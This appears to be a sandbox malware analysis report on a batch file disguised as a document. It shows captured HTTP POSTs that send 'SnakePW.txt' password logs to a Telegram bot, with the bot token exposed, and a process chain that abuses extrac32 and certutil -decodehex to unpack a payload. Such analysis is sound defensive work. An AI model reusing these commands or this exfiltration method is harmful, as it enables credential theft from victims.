                                                                                                        2024-12-18 15:32:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419258,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535950,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        121192.168.2.849939149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:29 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd23336ff9d791
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 33 33 36 66 66 39 64 37 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd23336ff9d791Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:30 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419260,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535950,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        122192.168.2.849940149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:30 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd271e66cb8366
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:30 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 31 65 36 36 63 62 38 33 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd271e66cb8366Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:30 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419262,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535950,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        123192.168.2.849946149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd253f1bc168da
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 33 66 31 62 63 31 36 38 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd253f1bc168daContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 35 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419264,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535952,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        124192.168.2.849947149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd235621b119df
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 35 36 32 31 62 31 31 39 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd235621b119dfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 35 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419266,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535952,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        125192.168.2.849948149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:36 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd27765a939a1a
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:36 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 37 36 35 61 39 33 39 61 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd27765a939a1aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:36 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 35 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419270,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535956,"documen


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:10:30:24
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "
                                                                                                        Imagebase:0x7ff605f50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:10:30:24
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:3
                                                                                                        Start time:10:30:24
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                        Imagebase:0x7ff7ed270000
                                                                                                        File size:35'328 bytes
                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                        Imagebase:0x7ff7ed270000
                                                                                                        File size:35'328 bytes
                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                        Imagebase:0x7ff792cf0000
                                                                                                        File size:1'651'712 bytes
                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                                                                                        Imagebase:0x7ff792cf0000
                                                                                                        File size:1'651'712 bytes
                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'019'392 bytes
                                                                                                        MD5 hash:46FC1E1BCA07585CF21CC37149F2B424
